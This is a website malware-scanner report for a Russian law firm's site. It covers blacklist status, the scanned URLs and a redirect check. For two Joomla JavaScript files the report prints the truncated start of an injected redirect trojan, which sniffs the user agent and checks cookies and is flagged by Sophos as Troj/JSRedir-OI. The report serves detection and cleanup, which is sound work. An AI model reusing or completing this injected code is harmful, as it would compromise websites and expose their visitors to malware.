New scan:

Malware Scanner report for advokaty-vrn.ru

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "advokaty-vrn.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/6
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=advokaty-vrn.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://advokaty-vrn.ru/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://advokaty-vrn.ru/
200 OK
Content-Length: 47263
Content-Type: text/html
clean
http://advokaty-vrn.ru/media/system/js/modal.js
200 OK
Content-Length: 11581
Content-Type: application/x-javascript
clean
http://advokaty-vrn.ru//ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js/
404 NOT FOUND
Content-Length: 42129
Content-Type: text/html
clean
http://advokaty-vrn.ru/components/com_k2/js/k2.js
200 OK
Content-Length: 7642
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Visitrepositorium() {
var pipka = navigator.userAgent;
var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
var bb = (getCookie("lastshow") === undefined);
... 3069 bytes are skipped ...

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://advokaty-vrn.ru/media/system/js/caption.js
200 OK
Content-Length: 2956
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Visitrepositorium() {
var pipka = navigator.userAgent;
var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
var bb = (getCookie("lastshow") === undefined);
... 1336 bytes are skipped ...
r.appendChild(element);
if ( element.title != "" ) {
container.appendChild(text);
}
container.className = this.selector.replace('.', '_');
container.className = container.className + " " + align;
container.setAttribute("style","float:"+align);
container.style.width = width + "px";
}
});
document.caption = null;
window.addEvent('load', function() {
var caption = new JCaption('img.caption')
document.caption = caption
});

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://advokaty-vrn.ru/templates/paradigm_shift/js/s5_flex_menu.js
200 OK
Content-Length: 43661
Content-Type: application/x-javascript
clean
http://advokaty-vrn.ru/modules/mod_s5_box/js/moo124/s5box.js
200 OK
Content-Length: 16876
Content-Type: application/x-javascript
clean
http://advokaty-vrn.ru/modules/mod_s5_box/js/s5_box_hide_div.js
200 OK
Content-Length: 1362
Content-Type: application/x-javascript
clean
http://counter.rambler.ru/top100.jcn?2767296
200 OK
Content-Length: 6853
Content-Type: application/x-javascript
clean
http://advokaty-vrn.ru/tarify
200 OK
Content-Length: 46762
Content-Type: text/html
clean
http://advokaty-vrn.ru/tarify/komand
200 OK
Content-Length: 32889
Content-Type: text/html
clean
http://advokaty-vrn.ru/tarify/min-vozn
200 OK
Content-Length: 35455
Content-Type: text/html
clean
http://advokaty-vrn.ru/ur-uslygi/zemelnye-spory-advokat
200 OK
Content-Length: 30670
Content-Type: text/html
clean
http://advokaty-vrn.ru/semeinye-otn-advokat/
200 OK
Content-Length: 30596
Content-Type: text/html
clean
http://advokaty-vrn.ru/bank-spory/
200 OK
Content-Length: 32088
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: advokaty-vrn.ru

Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 18 Sep 2014 05:58:29 GMT
Pragma: no-cache
Server: Apache
Content-Language: ru
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 18 Sep 2014 05:58:29 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 0c3055a131caeea9b9b7b3c4bb97485c=9ce660d010aa0808e6d24a205962ee6e; path=/
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: advokaty-vrn.ru
Referer: http://www.google.com/search?q=advokaty-vrn.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.